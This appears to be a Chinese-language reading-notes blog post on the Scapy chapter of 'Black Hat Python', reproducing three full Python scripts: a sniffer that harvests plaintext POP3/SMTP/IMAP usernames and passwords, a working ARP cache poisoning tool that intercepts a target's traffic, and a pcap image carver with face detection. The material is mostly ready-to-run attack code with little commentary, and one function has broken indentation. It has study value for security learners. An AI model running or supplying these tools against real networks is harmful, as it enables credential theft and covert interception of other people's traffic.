读书笔记 -《Python 黑帽子》 ( 三 )

读书笔记系列文章

一直都在读书，读了忘，忘了再读。不如把每次学到的东西都写下来

第四章 Scapy: 网络的掌控者

Scapy 的十分强大的，前两章的东西可以用 Scapy 用简单的几行代码就能实现。BPF，pcap 文件这些基本通用的东西在阅读本章前最后先自己补充一下。
Scapy有一个非常强大的功能就是读取 pcap 文件，然后对其中的会话做重组。在写嗅探工具的时候，要么用 libnids来做 tcp 的重组，要不自己写代码重组，这也是我一直在纠结的一些东西。scapy 以一种非常简单的方式提供了这样的功能。

窃取 Email 认证

作者首先用这一章简单介绍了 scapy 的威力。
email 使用的就是 SMTP、POP3、IMAP这些协议，这些协议里面使用了一些明文的关键字，通过这些关键字，可以找到用户名、密码这样的信息。
思路就是使用 scapy 来做嗅探，使用 BPF 过滤一些数据，然后在这些数据里面找关键字。

代码也是很简单易懂，其中TCP 是 Scapy 定义的， packet 也是捉取数据后的参数，一个类实例。

读代码注释就可以了，不需要更多的解释

import threading
from scapy.all import *

# our packet callback
def packet_callback(packet):

    if packet[TCP].payload:

        mail_packet = str(packet[TCP].payload)

        if "user" in mail_packet.lower() or "pass" in mail_packet.lower():

            print "[*] Server: %s" % packet[IP].dst
            print "[*] %s" % packet[TCP].payload


# fire up our sniffer
sniff(filter="tcp port 110 or tcp "
             ""
             ""
             " 25 or tcp port 143", prn=packet_callback, store=0)

利用 Scapy 进行 ARP 缓存投毒

作者说『ARP 投毒是黑客工具箱中最古老最有效的攻击方式之一』。原理也是很简单，通过发送 arp 报文，欺骗目标机，使目标机以为，拥有网关 ip 地址的 mac 地址，为黑客所使用的机器的 mac 地址。这样目标机会把所有流量发给黑客而不是网关。黑客开启 ip 转发功能，把目标机发送过来的数据转发给网关，这应在不影响目标机上网的情况下，拿到了目标机的所有发出的流量，通过嗅探，可以分析发现这些流量中的内容。

本节的内容就是写一个 arp 欺骗的工具

from scapy.all import *
import os
import sys
import threading

interface    = "en1"
target_ip    = "172.16.1.71"
gateway_ip   = "172.16.1.254"
packet_count = 1000
poisoning    = True

def restore_target(gateway_ip,gateway_mac,target_ip,target_mac):

    # slightly different method using send
    print "[*] Restoring target..."
    send(ARP(op=2, psrc=gateway_ip, pdst=target_ip, hwdst="ff:ff:ff:ff:ff:ff",hwsrc=gateway_mac),count=5)
    send(ARP(op=2, psrc=target_ip, pdst=gateway_ip, hwdst="ff:ff:ff:ff:ff:ff",hwsrc=target_mac),count=5)

def get_mac(ip_address):

    responses,unanswered = srp(Ether(dst="ff:ff:ff:ff:ff:ff")/ARP(pdst=ip_address),timeout=2,retry=10)

    # return the MAC address from a response
    for s,r in responses:
        return r[Ether].src

    return None

def poison_target(gateway_ip,gateway_mac,target_ip,target_mac):
    global poisoning

    poison_target = ARP()
    poison_target.op   = 2
    poison_target.psrc = gateway_ip
    poison_target.pdst = target_ip
    poison_target.hwdst= target_mac

    poison_gateway = ARP()
    poison_gateway.op   = 2
    poison_gateway.psrc = target_ip
    poison_gateway.pdst = gateway_ip
    poison_gateway.hwdst= gateway_mac

    print "[*] Beginning the ARP poison. [CTRL-C to stop]"

    while poisoning:
        send(poison_target)
        send(poison_gateway)

        time.sleep(2)

    print "[*] ARP poison attack finished."

    return

# set our interface
conf.iface = interface

# turn off output
conf.verb  = 0

print "[*] Setting up %s" % interface

gateway_mac = get_mac(gateway_ip)

if gateway_mac is None:
    print "[!!!] Failed to get gateway MAC. Exiting."
    sys.exit(0)
else:
    print "[*] Gateway %s is at %s" % (gateway_ip,gateway_mac)

target_mac = get_mac(target_ip)

if target_mac is None:
    print "[!!!] Failed to get target MAC. Exiting."
    sys.exit(0)
else:
    print "[*] Target %s is at %s" % (target_ip,target_mac)

# start poison thread
poison_thread = threading.Thread(target=poison_target, args=(gateway_ip, gateway_mac,target_ip,target_mac))
poison_thread.start()

try:
    print "[*] Starting sniffer for %d packets" % packet_count

    bpf_filter  = "ip host %s" % target_ip
    packets = sniff(count=packet_count,filter=bpf_filter,iface=interface)

except KeyboardInterrupt:
    pass

finally:
    # write out the captured packets
    print "[*] Writing packets to arper.pcap"
    wrpcap('arper.pcap',packets)

    poisoning = False

    # wait for poisoning thread to exit
    time.sleep(2)

    # restore the network
    restore_target(gateway_ip,gateway_mac,target_ip,target_mac)
    sys.exit(0)

处理 PCAP 文件

这一节的内容我感觉是比较多，不太那么纯粹了，竟然利用 opencv 来做人脸识别。
这一节代码的功能是提取 pcap 文件中的 tcp 会话，从中找到 http 数据，再找到图片数据，把图片存入本地，然后使用 opencv 识别这些图片，查看这些图片是不是人脸。
这一节我最欣赏的是 scpay 对会话重组功能实现的，真的是非常好用，其它的功能不是那么吸引人了。

根据我描述的功能，再去读这些代码就比较简单了。具体的实现细节涉及到了 opencv 的使用，http 协议的格式等。不了解这些知识，自己上网搜索补充后，就能看懂了。

import re
import zlib
import cv2

from scapy.all import *

pictures_directory = "pic_carver/pictures"
faces_directory    = "pic_carver/faces"
pcap_file          = "bhp.pcap"

def face_detect(path,file_name):

        img     = cv2.imread(path)
        cascade = cv2.CascadeClassifier("haarcascade_frontalface_alt.xml")
        rects   = cascade.detectMultiScale(img, 1.3, 4, cv2.cv.CV_HAAR_SCALE_IMAGE, (20,20))

        if len(rects) == 0:
                return False

        rects[:, 2:] += rects[:, :2]

    # highlight the faces in the image        
    for x1,y1,x2,y2 in rects:
        cv2.rectangle(img,(x1,y1),(x2,y2),(127,255,0),2)

    cv2.imwrite("%s/%s-%s" % (faces_directory,pcap_file,file_name),img)

        return True

def get_http_headers(http_payload):

    try:
        # split the headers off if it is HTTP traffic
        headers_raw = http_payload[:http_payload.index("\r\n\r\n")+2]

        # break out the headers
        headers = dict(re.findall(r"(?P<name>.*?): (?P<value>.*?)\r\n", headers_raw))
    except:
        return None

    if "Content-Type" not in headers:
        return None

    return headers

def extract_image(headers,http_payload):

    image      = None
    image_type = None

    try:
        if "image" in headers['Content-Type']:

            # grab the image type and image body
            image_type = headers['Content-Type'].split("/")[1]

            image = http_payload[http_payload.index("\r\n\r\n")+4:]

            # if we detect compression decompress the image
            try:
                if "Content-Encoding" in headers.keys():
                    if headers['Content-Encoding'] == "gzip":
                        image = zlib.decompress(image,16+zlib.MAX_WBITS)
                    elif headers['Content-Encoding'] == "deflate":
                        image = zlib.decompress(image)
            except:
                pass    
    except:
        return None,None

    return image,image_type

def http_assembler(pcap_file):

    carved_images   = 0
    faces_detected  = 0

    a = rdpcap(pcap_file)

    sessions      = a.sessions()    

    for session in sessions:

        http_payload = ""

        for packet in sessions[session]:

            try:
                if packet[TCP].dport == 80 or packet[TCP].sport == 80:

                    # reassemble the stream into a single buffer
                    http_payload += str(packet[TCP].payload)

            except:
                pass

        headers = get_http_headers(http_payload)

        if headers is None:
            continue

        image,image_type = extract_image(headers,http_payload)

        if image is not None and image_type is not None:                

            # store the image
            file_name = "%s-pic_carver_%d.%s" % (pcap_file,carved_images,image_type)
            fd = open("%s/%s" % (pictures_directory,file_name),"wb")
            fd.write(image)
            fd.close()

            carved_images += 1

            # now attempt face detection
            try:
                result = face_detect("%s/%s" % (pictures_directory,file_name),file_name)

                if result is True:
                    faces_detected += 1
            except:
                pass


    return carved_images, faces_detected


carved_images, faces_detected = http_assembler(pcap_file)

print "Extracted: %d images" % carved_images
print "Detected: %d faces" % faces_detected